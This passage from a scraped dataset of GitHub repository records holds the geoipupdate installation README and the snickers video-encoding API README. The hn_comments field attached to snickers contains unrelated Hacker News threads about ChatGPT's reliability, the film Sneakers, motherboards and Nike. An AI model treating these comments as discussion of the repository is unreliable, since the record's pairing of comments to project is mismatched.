Operator (https://github.com/zalando/postgres-operator). This gives us some added flexibility, quick startup (e.g. for e2e), and the latest PG features. That being said, I would be careful to recommend any specific stateful workload approach without good understanding of the whole setup (true for whatever cloud/k8s/onprem environment).", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "maxmind/geoipupdate", "link": "https://github.com/maxmind/geoipupdate", "tags": [], "stars": 528, "description": "GeoIP update client code", "lang": "Go", "repo_lang": "", "readme": "# GeoIP Update\n\nThe GeoIP Update program performs automatic updates of GeoIP2 and\nGeoLite2 binary databases. CSV databases are _not_ supported.\n\n## Installation\n\nWe provide releases for Linux, macOS (darwin), and Windows. Please see the\n[Releases](https://github.com/maxmind/geoipupdate/releases) tab for the\nlatest release.\n\nAfter you install GeoIP Update, please refer to our\n[documentation](https://dev.maxmind.com/geoip/updating-databases?lang=en) for information\nabout configuration.\n\nIf you're upgrading from GeoIP Update 3.x, please see our [upgrade\nguide](https://dev.maxmind.com/geoip/upgrading-geoip-update?lang=en).\n\n### Installing on Linux via the tarball\n\nDownload and extract the appropriate tarball for your system. You will end\nup with a directory named something like `geoipupdate_4.0.0_linux_amd64`\ndepending on the version and architecture.\n\nCopy `geoipupdate` to where you want it to live. To install it to\n`/usr/local/bin/geoipupdate`, run the equivalent of `sudo cp\ngeoipupdate_4.0.0_linux_amd64/geoipupdate /usr/local/bin`.\n\n`geoipupdate` looks for the config file `/usr/local/etc/GeoIP.conf` by\ndefault.\n\n### Installing on Ubuntu via PPA\n\nMaxMind provides a PPA for recent versions of Ubuntu. To add the PPA to\nyour sources, run:\n\n```\n$ sudo add-apt-repository ppa:maxmind/ppa\n```\n\nThen install `geoipupdate` by running:\n\n```\n$ sudo apt update\n$ sudo apt install geoipupdate\n```\n\n### Installing on Ubuntu or Debian via the deb\n\nYou can also use the tarball.\n\nDownload the appropriate .deb for your system.\n\nRun `dpkg -i path/to/geoipupdate_4.0.0_linux_amd64.deb` (replacing the\nversion number and architecture as necessary). You will need to be root.\nFor Ubuntu you can prefix the command with `sudo`. This will install\n`geoipupdate` to `/usr/bin/geoipupdate`.\n\n`geoipupdate` looks for the config file `/etc/GeoIP.conf` by default.\n\n### Installing on RedHat or CentOS via the rpm\n\nYou can also use the tarball.\n\nDownload the appropriate .rpm for your system.\n\nRun `rpm -Uvhi path/to/geoipupdate_4.0.0_linux_amd64.rpm` (replacing the\nversion number and architecture as necessary). You will need to be root.\nThis will install `geoipupdate` to `/usr/bin/geoipupdate`.\n\n`geoipupdate` looks for the config file `/etc/GeoIP.conf` by default.\n\n### Installing on macOS (darwin) via the tarball\n\nThis is the same as installing on Linux via the tarball, except choose a\ntarball with \"darwin\" in the name.\n\n### Installing on macOS via Homebrew\n\nIf you are on macOS and you have [Homebrew](http://brew.sh/) you can install\n`geoipupdate` via `brew`\n\n```\n$ brew install geoipupdate\n```\n\n### Installing on Windows\n\nDownload and extract the appropriate zip for your system. You will end up\nwith a directory named something like `geoipupdate_4.0.0_windows_amd64`\ndepending on the version and architecture.\n\nCopy `geoipupdate.exe` to where you want it to live.\n\n`geoipupdate` looks for the config file\n`\\ProgramData\\MaxMind/GeoIPUpdate\\GeoIP.conf` on your system drive by\ndefault.\n\n### Installing via Docker\n\nPlease see our [Docker documentation](doc/docker.md).\n\n### Installation from source or Git\n\nYou need the Go compiler (1.13+). You can get it at the [Go\nwebsite](https://golang.org).\n\nThe easiest way is via `go get`:\n\n $ env GO111MODULE=on go get -u github.com/maxmind/geoipupdate/v4/cmd/geoipupdate\n\nThis installs `geoipupdate` to `$GOPATH/bin/geoipupdate`.\n\n# Configuring\n\nPlease see our [online guide](https://dev.maxmind.com/geoip/updating-databases?lang=en) for\ndirections on how to configure GeoIP Update.\n\n# Documentation\n\nSee our documentation for the [`geoipupdate` program](doc/geoipupdate.md)\nand the [`GeoIP.conf` configuration file](doc/GeoIP.conf.md).\n\n# Default config file and database directory paths\n\nWe define default paths for the config file and database directory. If\nthese defaults are not appropriate for you, you can change them at build\ntime using flags:\n\n go build -ldflags \"-X main.defaultConfigFile=/etc/GeoIP.conf \\\n -X main.defaultDatabaseDirectory=/usr/share/GeoIP\"\n\n# Bug Reports\n\nPlease report bugs by filing an issue with [our GitHub issue\ntracker](https://github.com/maxmind/geoipupdate/issues).\n\n# Copyright and License\n\nThis software is Copyright (c) 2018 - 2022 by MaxMind, Inc.\n\nThis is free software, licensed under the [Apache License, Version\n2.0](LICENSE-APACHE) or the [MIT License](LICENSE-MIT), at your option.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "snickers/snickers", "link": "https://github.com/snickers/snickers", "tags": ["encoding", "ffmpeg", "video", "rest", "api", "multimedia"], "stars": 528, "description": ":chocolate_bar: An open source alternative to the video cloud encoding services.", "lang": "Go", "repo_lang": "", "readme": "

\n \n

\n

\n\n[![Build Status](https://travis-ci.org/snickers/snickers.svg?branch=master)](https://travis-ci.org/snickers/snickers)\n[![codecov](https://codecov.io/gh/snickers/snickers/branch/master/graph/badge.svg)](https://codecov.io/gh/snickers/snickers)\n[![Go Report Card](https://goreportcard.com/badge/github.com/snickers/snickers)](https://goreportcard.com/report/github.com/snickers/snickers)\n

\nSnickers is an open source alternative to the existent cloud encoding services. It is a HTTP API that encode videos.\n\n## Setting Up\n\nFirst make sure you have [Go](https://golang.org/dl/) and [FFmpeg](http://ffmpeg.org/) with `--enable-shared` installed on your machine. If you don't know what this means, look at how the dependencies are being installed on our [Dockerfile](https://github.com/snickers/snickers-docker/blob/master/Dockerfile).\n\nDownload the dependencies:\n\n```\n$ make build\n```\n\nYou can store presets and jobs on memory or [MongoDB](https://www.mongodb.com/). On your `config.json` file:\n\n- For MongoDB, set `DATABASE_DRIVER: \"mongo\"` and `MONGODB_HOST: \"your.mongo.host\"`\n- For memory, just set `DATABASE_DRIVER: \"memory\"` and you're good to go.\n\nPlease be aware that in case you use `memory`, Snickers will persist the data only while the application is running.\n\nRun!\n\n```\n$ make run\n```\n\n## Running tests\n\nMake sure you have [mediainfo](https://sourceforge.net/projects/mediainfo/) installed and a local instance of [MongoDB](https://github.com/mongodb/mongo) running.\n\n```\n$ make test\n```\n\n## Using the API\n\nCheck out the [Wiki](https://github.com/snickers/snickers/wiki/How-to-Use-the-API) to learn how to use the API.\n\n## Contributing\n\n1. Fork it\n2. Create your feature branch: `git checkout -b my-awesome-new-feature`\n3. Commit your changes: `git commit -m 'Add some awesome feature'`\n4. Push to the branch: `git push origin my-awesome-new-feature`\n5. Submit a pull request\n\n## License\n\nThis code is under [Apache 2.0 License](https://github.com/snickers/snickers/blob/master/LICENSE).\n\n", "readme_type": "markdown", "hn_comments": "I\u2019m envisioning a bifurcation of reality where some people live in an entirely fact based world (or as close an approximation to fact based as a human can objectively reach, aka the observable, knowable universe) and some live in a complete fabrication, a fantasy version carefully crafted by AIs. Now add Augmented Reality to the mix, and it\u2019s a dystopian nightmare.And I don\u2019t think the US political left will be immune to it as much as they may think. While I agree that older Americans on the right are highly susceptible to misinformation, and media literacy is dismal among that demographic, younger people are also prone to it. Just look at all the unhinged utter nonsense that is wildly popular on TikTok.The ability of ML models to authoritatively spout bullshit will make gish gallops worse than they are now. It will also make echo chambers even worse, as digital alternate realities will further divide people. I mean, who wants to engage with those who completely rejects that the sky is objectively blue, or that 2 + 2 = 4? Well now they\u2019ll have articulate, authoritative responses with works cited explaining why the sky is red, actually.Who needs Big Brother when people choose the method of their own subjugation eagerly and with dessert?ChatGPT is like that tipping point where things starts to get wild. It really seem like a tipping point. Put another way, it opens up a new graph and it set at zeroNo matter how cool something is, there will always be people saying it isn't that impressive. Perpetual motion could be invented and there would still be people going \"yeah sure, but it's not a free energy machine so it's a scam\"Maybe I missed the memo but why isn't anyone impressed that a computer can generate well formed prose in response to arbitrary questions? It seems like we've completely leaped over that as an achievement and are now arguing over how it's confidently wrong or how there are emergent patterns in what it has to say. No one is claiming it's a general intelligence but it's still amazingly impressive.Heh, this makes it sound like consultants will be the hardest hit by the LLM-driven automation wave.What a pointless article.It seems somehow that Asimov got it right. The obvious next steps are all about making it smarter but also implement the right ethic rules...Ah yes let's anthropomorphize a bunch of numbers, then name him a con artist. This is going to be a thoughtful articleI wonder if the biggest shortcoming of GPT right now is not that it sometimes gets things wrong, or can't cite its sources, or whatever - maybe it needs to learn when to say \"I don't know the answer to that question\".That's a pretty hard thing for most humans (and myself) to learn to say, and I suspect GPT's training data (tha internet) doesn't include a lot of \"I'm not sure\" language and probably does include a lot of \"I'm definitely sure and definitely totally correct\" language (maybe, I guess, no evidence to back up that suggestion, I'm not sure).Many of my favorite coworkers, friends, doctors, pundits are trustworthy exactly because they work hard to not profess knowledge they are unsure about. The reason (IMO) that Scott Alexander is a jewel of the internet is because of the way he quantifies uncertainty when working through a topic.I don't think GPT is a con, it's doing exactly what it was trined to do. I think the problem is people put false confidence into it. Because it appears to give correct information, ChatGPT has been put on this pedestal by the non-tech world as being some revolution. In fact it's not a revolution, they just figured out how to build a chatbot that returns convincing statements that sounds human, correct information is not it's' strong suit, sounding smooth in a conversation is.Dismissive to tech that isn\u2019t mostly gimmick is dangerous. Dismissive to crypto isn\u2019t dangerous. They other thread, someone said AI is the beginning of web3.0, that made 50x more sense than saying crypto ismy challenge to whomever that proclaims chatgpt showed/explained/answered xyz is: can you get the same (or similar) text online by searching parts of the bot's response?much of the response in such scenarios is heavily influenced by the training data and not the llm creating phrases from thin air.Does anyone else have issue with having to provide a phone number to access it?I signed up, verified email, and then was told I needed to verify with phone. This means, to me, (lest I read their TOS) that they are associating any queries I make with my identity.I can't wait for this tech to go open source and local on devices.ChatGPT is good for some things, it's not very good for others. If you're writing a paper on a controversial topic, you're going to get a one sided and biased answer; and it will be written like a HS freshman. If you're asking something straight forward, you'll have a better experience. Some people have said they've gotten it to diagnose something, but I've tried and failed at getting it to do such a thing. I do think there is a massive over reaction to its usefulness, but it is a powerful tool to have, nevertheless.See also: https://en.wikipedia.org/wiki/Hallucination_(artificial_inte...Who are these people who see something amazing like this and actually just can\u2019t process it? Their brains can\u2019t handle it.> You don\u2019t worry whether it\u2019s true or not\u2014because ethical scruples aren\u2019t part of your job description.I wonder if this might hit the core of the matter.I think it's noteworthy that we use it both for tasks where it should generate fiction (\"Tell me a story about a dog in space\") and tasks where it should retrieve a factual answer (\"What was the name of the first dog in space?\").I wonder if ChatGPT actually distinguishes between those two kinds of tasks at all.I can't tell what is worse now: the sycophantic ChatGPT hype guys/gals who write articles \"it's coming for all of our jerbs!\", or articles like this one that deliberately misuse ChatGPT and then say \"it's overhyped\".They're both missing the point.Yes, ChatGPT can be tricked, confidently give wrong answers, but it is still ludicrously useful.It is basically like having an incredibly smart engineer/scientists/philosopher/etc that can explain things quite well, but for pretty much every field. Does this \"person\" make mistakes? Can't cite their sources? Yeah this definitely happens (especially the sources thing), but when you're trying to understand something new and complex and you can't get the \"gist\" of it, ChatGPT does surprisingly well.I've had it debug broken configs on my server and router (and explain to me why they were broken), help me practice a foreign language I've slowly been forgetting (hint: \"I would like to practice $language, so let's have a conversation in $language where you only use very simple words.\" -> ChatGPT will obey), and help me understand how to use obscure software libraries that don't have much documentation online (e.g. Boost Yap, useful but with a dearth of blog / reddit posts about it).Does it sometimes goof up? Yep, but it is such an incredibly useful tool nonetheless for the messy process of learning something new.It\u2019s a very good demonstration of how powerful artifical intelligence will be. When we truly get that it will be the new dominant species.But it\u2019s just not intelligent. There\u2019s no thoughts there. They\u2019ve just brute forced a really big markov chain. You need a completely different approach to get true intelligence.I'm finding the analytic-synthetic distinction to be somewhat useful, even if it veers in important ways from how these terms were defined and used by Kant/Frege/Quine, etc.Roughly, if the prompt is \"analytic\", that is contains all the necessary facts for the expected output, then the tool is much more reliable.If the prompt is \"synthetic\", that is it contingent on outside facts, then the tool is much less reliable.All this buzz around ChatGPT is really people finally realizing that transformers exist.I used daily to ask technical questions and it answers better than most of my colleagues and myself included.I wouldn't call that a con. But that blogpost maybe ^^That last tweet is crazy:Tell me a lie: The earth is flat\nTell me a less obvious lie: I am not capable of feeling emotions.There's wonderful ambiguity there. Is ChatGPT refusing to tell a less obvious lie because \"reasons,\" or is it admitting it can feel emotions?This is very fun.So what are search engines, with SEO'd results and all?If it was \"the slickest con artist of all time\", that would be an achivement of Artificial General Intelligence that the AI community can only dream of.\"Cars won't replace horses, because they require roads and horses don't.\"It seems particularly bad about music theory. The article lists the example of listing Bb as the tritone of F (it's actually B). And I just got it to give me complete and utter garbage, whilst sounding confident:https://i.imgur.com/S07uT58.pngChatGPT was hailed and advertised as conversational, by its creators.Other people quickly realized it could have a conversation about anything and try to use it as an oracle of knowledge. ChatGPT is not hailed as an oracle of knowledge by its creators.Hence, there is no con artistry occurring except people that play themselves.I would greatly appreciate a moratorium on this genre of article until there is compelling accompanying evidence that a meaningful portion of ChatGPT's users are unaware of these shortcomings. I have yet to encounter or even hear of a non-technical person playing around with ChatGPT without stumbling into the type of confidently-stated absurdities and half-truths displayed in this article, and embracing that as a limitation of the tool.It seems to me that the overwhelming majority of people working with ChatGPT are aware of the \"con\" described in this article -- even if they view it as a black box, like Google, and lack a top-level understanding of how an LLM works. Far greater misperceptions around ChatGPT prevail than the idea that it is an infallible source of knowledge.I'm in my 30s, so I remember the very early days of Wikipedia and the crisis of epistemology it seemed to present. Can you really trust an encyclopedia anyone can edit? Well, yes and no -- it's a bit like a traditional encyclopedia in that way. The key point to observe is that two decades on, we're still using it, a lot, and the trite observation that it \"could be wrong\" has had next to no bearing on its social utility. Nor have repeated observations to that effect tended to generate much intellectually stimulating conversation.So yeah, ChatGPT gets stuff wrong. That's the least interesting part of the story.I don't think Ted Gioia understands what he's talking about.It's like he walked into a McDonalds bathroom and after a few minutes asks, \"Where the hell are the burgers?\"This my personal opinion and may be entirely worthless. The quality of answers I read in all of the examples posted in that article read like the questions were routed to an offshore boiler room where the answers were crafted by humans. Like some modern day Mechanical Turk. Especially in the 6 eggs example, there is a complete discontinuity of thought across the answers, isn't this within a single session with the AI? To me it looks like different brains answered each question/challenge and seemed to have a bias toward not offending the human asking the questions.Also, in this example, the first answer of 2 is correct: broke 2 (6-2 = 4), fried 2 (4-2 = 2) then ate 2, which most commonly implies it was the fried eggs that were eaten (2-0 = 2)One thing that\u2019s standing out is most of the commentary around this is relative to the depth and degree to which someone has played around with this technology.For example, you can get really clean results if you obsess over getting the prompts dialled in, and breaking them up in the right order as much as needed. This wasn\u2019t something I initially focussed in on. I just enjoyed Playing with it as a surface level.Using this rate from the first day or two, it was much more wide-open and my feeling was I think this already does way more than it\u2019s being advertised. I didn\u2019t necessarily like that it was a chat interface, but but was quickly reminded that chat really is the universal interface, and that can create a lot of beginners. Solutions aside, the interface is inviting and welcoming enough. And once you can get into the meat of a conversation you can get more depth. For me, that\u2019s one of the accomplishments here.Solely relying on this for completely true results is probably the con. It is a great way to learn about the concepts that might be present in an area that is new to you, but he doesn\u2019t comment on every individual to go look into those themselves.The second we do for that ability entirely to a machine, and its interpretation of interpretations, that\u2019s a much bigger failure to ourselves.There\u2019s no doubt this will get dialled in. And 20 bucks a month to apply general helpfulness to pretty much anything, in anyone\u2019s world, could be a pretty big achievement.The commentary around accuracy of results from GPT in similar to the search engine wars as well as search engine relevancy domination when google arrows. I think in any event many people can agree that this one thing is very different than most of the other things that comes out. Could it be approaching an Apex? Could we be coming out of the Apex?I sincerely feel 2023 will be one of the most interesting years in tact that I can remember. And that\u2019s not even talking about the next two or three years. It is refreshing to see a months worth of progress happening in a week with such a broad audience participating in it.Two things are correct at the same time:* ChatGPT can make mistakes very confidently* ChatGPT is incredibly useful in a way that no other tool has ever been, with a jump in effectiveness for natural language interaction that is mindblowingI actually think the more people use it the better it gets over time, they would use user feedback into it and make it better, I am afraid google releases a much better tool in Google.io though, just don't tell anyone.Are there any good AI models specifically designed for the \"find all discrepancies/inconsistencies between X text and Y text\" problem?It strikes me that this could solve quite a few of ChatGPT's shortcomings by providing an automatic fact-checker - let ChatGPT create statistically-probable articles, then extract claims, generate search queries likely to find online reference articles from reputable sources for those claims, then compare the original claim against the text of each reference article, and escalate to a human if any inconsistencies are found.Because it can fine-tune on specific reference resources for a specific generated text, it could prove more reliable than ChatGPT's gradual incorporation of this feedback as part of its adversarial training.My brain doesn't learn anything easily. I have to ask constant questions to the point of annoying embarrassment in class, and books of course only say what they say.So it was wonderful yesterday to pick ChatGPT's brain and just drill down asking more and more questions about a topic in biology until my brain started to get it.Assuming the answers are accurate, this is revolutionary for me personally in independent study. I may finally grasp so much that I missed in school.Also, when I am reading books, ChatGPT may be able to answer questions the book does not.\"Con man\" says the guy who quotes tweets as an entire article and doesn't actually say his thoughts himself.The more I work with LLMs, the more I think of them as plagiarization engines. They do to text what a bitcoin tumbler does to bitcoins: slice them up and recombine them so that it's difficult to trace any specific part of the output to any specific part of the input.It's not a perfect analogy, but it's useful in that it produces correct answers about what LLMs are and aren't good for. For example, the reason they make better chatbots than novelists is because slicing-and-recombining text from your documentation is a great way to answer customer product questions, but slicing-and-recombining text from old novels is a lousy way to write a novel.Sweet as bro.Pretty cool that GTP is hitting such a mainstream moment. Everyone I talk with about it has glazed over for years, but I guess this is finally a demo that breaks through. 100m users if reports are accurate.Of course regular folks are going to wildly overestimate GTP\u2019s current capabilities. Regular folks wildly overestimate the intelligence of their pets.ChatGPT is capable of reasoning but it has only one tool: \"thinking out loud\".If you'd like it to solve more complex problems, ask it to do it step by step, writing down the results of each step and only at the end stating the conclusion based on the previously written results. Its reasoning capabilities will improve significantly.It cannot do it \"in its head\" because it doesn't have one. All it has are previosuly generated tokens.I wrote some examples in this Twitter thread and pointed out some additional caveats: https://twitter.com/spion/status/1621261544959918080It has been a very good tool for me and it does threaten the internet with new piles of generated garbage.I've never had a tool as helpful for learning to use other (mostly software) tools. Building new ones to some extent. Other tools exist that are not for me -- I consider myself to be too absent-minded to drive something as dangerous as an automobile. It could very well be that a tool like ChatGPT is not for everyone -- if you are too gullible to use Google or social media, then this one is not for you, you should not get the driving licence for LLMs.The proliferation of garbage on the other hand may turn against more competent users as well eventually. I guess we have already falling behind of what is needed with the legal norms and internet/data ecology.Usefulness is the correct measure. ChatGPT is limited, but immediately very useful in a surprising number of ways. Compare that to the Bitcoin hype, where, even though it has had years, is still mainly useful for drug transactions and other illegal transfers.I have to admit I was a bit disappointed when I scrolled to the end and it didn't turn out this article was written by ChatGPT.This article reminds me of some guy on Twitter who says nothing in AI space has changed since 2020.Maybe so.But you know what\u2019s changed? Someone decided to get their a$$ out of the AI labs, write a really simple interface just to \u201cget it up\u201d and released it to the world.That definitely will trump anything else.Release early and release often.The author is just jealous.After having played it ChatGPT for a bit, mostly asking computer questions, I've had mixed results. Some are amazing, others are gibberish.But what struck me the other day is a couple of quotes from, of all things, Galaxy Quest which seem particularly apt. \"May I remind you that this man is wearing a costume, not a uniform.\"\n\nand \"You know, with all that makeup and stuff, I actually thought you were SMART for a second.\"\n\nAs amazing as it is, as progressive as it is, it's still a magic trick.The thing that makes me nervous about it isn't ChatGPT or other LLMs, really. It's that people seem to be easily fooled by them into thinking it's something more than it is. The comments from the most ardent fans imply that it's doing reasoning or is a step in the direction of AGI, when it's not that at all.Just another clickbait articleWhen will it demonstrate passing the Turing Test?I feel the answer is not which year, but which month of 2023Is it just me or are peoples expectations of chatGPT absolutely ridiculous?No it's not a magic oracle. Yes you still have to check your work. Yes it will make mistakes.But as a tool to assist you? It's incredible.Part of me thinks one of the big reasons Google has held back so much is because of ethical concerns and/or just general fear of not having complete knowledge of how AI (incomplete to boot) will impact the world. We know that Google has some extremely powerful AI, but they never let it out of the lab. Just the most heavily neutered and clamped versions to help accentuate their existing products.Now it seems that Open.AI/Microsoft are ready to jump in, caution to the wind. As you would expect the chance for a competitive advantage will always overwhelm external concerns.We'll see what Google does. They might say \"fuck it\" and finally give us a chance to play with whatever their top tier AI is. Or maybe they'll discredit it and try and compete with their current (ad optimized) search product. We'll see, but I am definitely curious to see how Google responds to all this.You can call it a con all you want but I have personally extracted a lot of value from ChatGPT. It _really_ made a difference in launching in a product in record time for me. It also taught me a bunch of things I would have otherwise never discovered.But go on calling it a con because it failed your arbitrary line in the sand question.I had a detailed conversion with chatGPT about how to gracefully handle terminating conditions of a rust program. It summarized cogently to register at_exit()\u2019s for each thread, panic handlers, and register signal handlers. It advised and explain in detail on my query about the thread handling for each of these variants, gave really helpful advice on collecting join handles in a closure on the main thread and waiting for the child threads to exit their at_exit handlers since at_exit can\u2019t guarantee when handlers will execute. It went into detail about cases the process won\u2019t have the ability to clean up. I was able to ask it a lot of clarifying questions and it provided useful responses with clear coherent explanations that were salient and considered the full context of the discussion. I\u2019m certain when I go to actually implement it it\u2019ll have gotten so details wrong. But it provided about as clear explanation of process termination mechanics (for Unix) as I\u2019ve seen articulated, and did so in a way that was directed by my questions not in a 300 page reference manual or random semi relevant questions in stackoverflow answered by partially right contributors.If this is a con, then consider me a mark.The thing that surprises me is all the people saying that it generates correct sql statements, excel macros, code snippets, etc. Is there so much code on the Internet that it is able to do a good job at this kind of task?My stance is pretty simple.The folks that adapt their own language centers and domain reasoning around using chatGPT (or these types of models) will stand to gain the most out of using them.This article is an eye roll to me, a calculator gives you confidence as well, doesn't mean you used it correctly.It is very hard for me to not outright dismiss articles like this that don't consider the usefulness of the tool. They instead search for every possible way to dismiss the tool.>My conclusion isn\u2019t just that ChatGPT is another con game\u2014it\u2019s the biggest one of them all.* YAAAAAWN *I think \"con artist\" isn't too far off, but \"dream simulator\" also applies.I think it's kind of an open question: can we learn anything from dreams? It's likely a yes, though I doubt we'll prove the Riemann hypothesis with it or anything like that.I found 10 tweets to backup my anecdotal argument but it gave me enough confidence to rant about chatgpt. If twitter is your source of data, how are you doing anything different from chatgpt? All I'm getting from this piece is that this person has a fundamental misunderstanding of why people are finding chatgpt useful.Too harsh!ChatGPT is lossily compressed knowledge of humanity collected on the Internet.And it can talk! That's extremely new for us poor hoomans and so we get extremely excited.I found out, it gets about one in ten things wrong. When this happens it spews confident bullshit and when I confront it, it cheerily admits that it was wrong, but can continue to produce further bullshit. I understand the comparison to a con man.Don\u2019t be afraid of ChatGPT but don\u2019t underestimate what it and others like it will be capable of as it is iterated on. You found one category of prompt that needs some iteration. Good job, if the team wasn\u2019t aware of this already, hopefully you helped point it out.It\u2019s not that the technology isn\u2019t capable of what you\u2019re asking, it just needs better training for this class of question.There are other things like generating and translating code that it excels on. I imagine that would be much harder. But we have great data to train for that and the engineers know enough to dogfood that properly.The way I've come to look at ChatGPT is via a D&D analogy.It's like a helpful Bard with 1 rank in all the knowledge skills and a good bluff roll.It'll give you good answers to a lot of basic queries, but if it doesn't know, it'll just make up something and provide that.Once you know that, I think it can be a lot of use and in many way, I think it'll get a lot better with time.I've already found it useful in basic programming tasks, specifically where I know how to do something in one language but not another, it can give me the equivalent code easily.All these articles really sound like \u201cI used an apple to hammer in a screw and it sucked. This has to be the worst plant-based object ever made\u201d. It\u2019s a common junior engineer approach. \u201cI broke our database by running DROP TABLE cows in the console\u201d. Yeah, dude, that\u2019s possible. Just don\u2019t do that.The point of tools isn\u2019t to use them like Homer Simpson. But you know what, it doesn\u2019t matter. Stay behind. Everyone else is going on ahead.I think we have to remember that ChatGPT is often a reflection of us, based its training.If I Google for a particular answer and the answer I come across is wrong, then the person who wrote that was wrong and Google served me a website that was wrong. This is the world we live in, where it is up to me to decide what is right or wrong based on what is put in front of me.If I use ChatGPT for a particular answer and the answer I come across is wrong, then the training of the GPT needs to be improved. What I can't do with ChatGPT is tell where the answer came from or the amount of confidence GPT has in its answer for me to make a more informed decision around whether there might be caveats.I have used it and have had to edit almost everything its provided, but it has helped me be sometimes 80% more efficient at what I need to achieve.In the end, people just need to be more aware of the fact that it is after all not a full proof product and may never be. It will have its shortcomings as it quite clearly displays on its website before you enter a query.If you use it as gospel and it leads you down the wrong path, then you only have yourself to blame.I don't understand why people are throwing a fit over this version of ChatGPT. Yes, it has problems but to me this is just a demonstration. I think this will be great for specialized cases like tech writing, requirements and system configuration. It could check requirements for consistency, test coverage and translate YAML config into something easier to understand. It could also look at your code and describe the design and point out problems.I can't wait for AI to assist in these tasks. It's time.Don\u2019t lose sight of the forest for the trees. ChatGPT is a tree, the vanguard, an experiment. There is much, much more to come, I believe.*beep*ChatGPT is a masterpiece. To code something from scratch that can do everything it does at the proficiency it does is impossible. Insane how quickly people take something for granted.The people who don't see the value in generating language that has a purpose outside of narrow niche of communicating facts will be let down for some time. This feels very Wittgenstein's Tractatus. There are so many other ways that we use language.I have a simple canary for ChatGPT correctness that I ask every time it's updated: \"What can you tell me about Ice Cold In Alex?\" / \"Who did Sylvia Syms play?\"I'm not expecting it to get the answer right (I don't think it has that information) but I'm hoping it'll eventually just admit it doesn't know instead of making up something plausible (\"Sister Margaret Parker\" last time I tried).As long as it doesn't know what it doesn't know, I'm inclined to think of it as a super-advanced Markov chain. Useful, impressive, but still basically a statistical trick.That's something I'd remember next time I'm looking at motherboards.ASRock's response to a Reddit post: https://www.reddit.com/r/ASRock/comments/xrdvnk/infuriating_...Can someone elaborate for me on the \"memory training\" responsible for the long initial boot times the sticker warns about?I skimmed this https://www.asset-intertech.com/resources/blog/2014/11/memor... and it sounds like a crutch for marginal silicon. How's it compare to Memtest86 and the like?It's called a manual! Print it and read it!Still one of my all time favourite movies.Be sure to check out this delightful article about a guy trying - and succeeding - to find the actual building of the \"toy company\" from the movie:https://mwichary.medium.com/toy-company-my-ass-421842476d06I really enjoyed Sneakers but I still visibly cringe whenever I hear this line:> A computer matched her with him? I don't think soFor me the pinnacle of how hacking is represented on the screen is Mr Robot by far.I love this movie, a staple of music childhood. My sister and I still make references to it.The various shooting locations around SF are cool, the meeting where he figures out they're not NSA is outside the Wharton building on the Embarcadero, my wife and I bike by every week.Such a great movie. One of the best hacking-related movies ever made for me personally.Related:\u200eCracking the Code: Sneakers at 30 - https://news.ycombinator.com/item?id=31378418 - May 2022 (76 comments)Memories of the \u201cSneakers\u201d Shoot (2012) - https://news.ycombinator.com/item?id=29840802 - Jan 2022 (198 comments)Sneakers: Robert Redford, River Phoenix nerd out in 1992\u2019s prescient caper - https://news.ycombinator.com/item?id=29620095 - Dec 2021 (7 comments)Sneakers (1992), the Film - https://news.ycombinator.com/item?id=26111977 - Feb 2021 (2 comments)Tool Recreating the \u201cDecrypting Text\u201d Effect Seen in the Movie \u201cSneakers\u201d - https://news.ycombinator.com/item?id=11643270 - May 2016 (54 comments)Sneakers - movie about pen testing, crypto/nsa, espionage, and deception (1992) - https://news.ycombinator.com/item?id=6196379 - Aug 2013 (5 comments)What it was like shooting the movie Sneakers - https://news.ycombinator.com/item?id=4498985 - Sept 2012 (46 comments)Sneakers (Film, 1992) - https://news.ycombinator.com/item?id=1499298 - July 2010 (1 comment)Joybubbles: the blind phreaker whom Whistler was based off of in Sneakers - https://news.ycombinator.com/item?id=1443241 - June 2010 (1 comment)It was not far ahead of its time. It was relevant then.It's still relevant-ish now, though the left-leaning hackers would likely embrace state agents in our own day and age. The bully would have to be a foreign adversary.Michael Selvidge has a fun Twitter thread with Sneakers info: https://twitter.com/selviano/status/1568298272900673538 / https://nitter.net/selviano/status/1568298272900673538It's worth noting that the War Games writers Lawrence Lasker and Walter F. Parkes paired up again on Sneakers where Lasker was a writer and Parkes was a producer.They shaped an entire generation of of geeks' thinking by telling good, accurate (if embellished) stories.My favorite Easter egg is the title as anagram for \u201cNSA reeks\u201dThey included some good clips, but they missed one of my favorite scenes: Navigating by Sound: https://www.youtube.com/watch?v=KuIheGaiFLMHuh:https://archive.org/details/Sneakers_Film_Promotional_Floppy (with inline emulator)Released in conjuction with the computer hacking movie \"Sneakers\" (1992), this floppy-based \"computer press kit\" contained many of the aspects of regular movie press kits, including cast bios, plots, and information on all aspects of production. It was intended for press, and as such is both \"locked up\" (via passwords) but also endeavored to help the same press get through the barriers as quickly as possible.The balancing act between technical complexity and simplicity to ensure promotion is quite notable.The program in question is DOS-based, and was released in 1992 as part of a package of both written and computer-based information.It was a great movie except for the bits making Republicans and Nixon out to be bad. They're no worse than any Democrat. Other than than, great movie.If dang or someone could edit my original title submission to fit the field it would be great. It would seem that the Android client I'm using truncates titles without warning.A solid movie with a solid soundtrack that isn't available on Spotify. There's a long tail out there that streaming services don't have and it's a bummer.One of the few movies with a mathematical consultant: Leonard Adleman -- The \"A\" in RSAIt really is an excellent movie, and understand that social engineering is the heart of hacking.Sneakers is in a league of its own.We've been desperate for more films of this type and quality ever since. Mr Robot was the only thing that came close in the first season.There must be a bunch of obscure B movies containing authentic tech/hacking/social engineering methods that just fly under the radar. Anyone know of a list?Slate on the 20th anniversaryhttps://www.metafilter.com/119793/Slate-celebrates-the-20th-...If someone is openly taking your money for the stuff they make and giving it to people who are pretty open about wanting to make your life worse, then they shouldn't be surprised if you quit buying their stuff. Actions have consequences, and being filthy rich shields you from some of them, but not all of them.And sometimes choosing to not take a side is, in fact, an action with distinct consequences.Here I thought the progressive ideology would be to not buy Nike's because they are overpriced garbage that has a history of questionable manufacturing processes. Professional sports in many ways are like the cornerstone of capitalism.And yet, Nike's sales surged when they brought on Kaepernick> Despite Fox News and parts of the social mediasphere predicting the Swoosh\u2019s downfall, the company claimed $163 million in earned media, a $6 billion brand value increase, and a 31% boost in sales.https://www.fastcompany.com/90399316/one-year-later-what-did...If I were running a business ethically, I'd want to mute my criticism of politics, including fairly extreme ones. Partisanship is tearing the world apart. I want people with different viewpoints to interact. That's the only way to address them. If we don't work together and we don't shop together, we'll grow more polarized as a result. Democracy isn't a battle, and you win by convincing people, and not by beating them down or punishing them. That means interacting with them.A business isn't a good venue for partisan change. It is an okay place for some types of politics (e.g. environmental 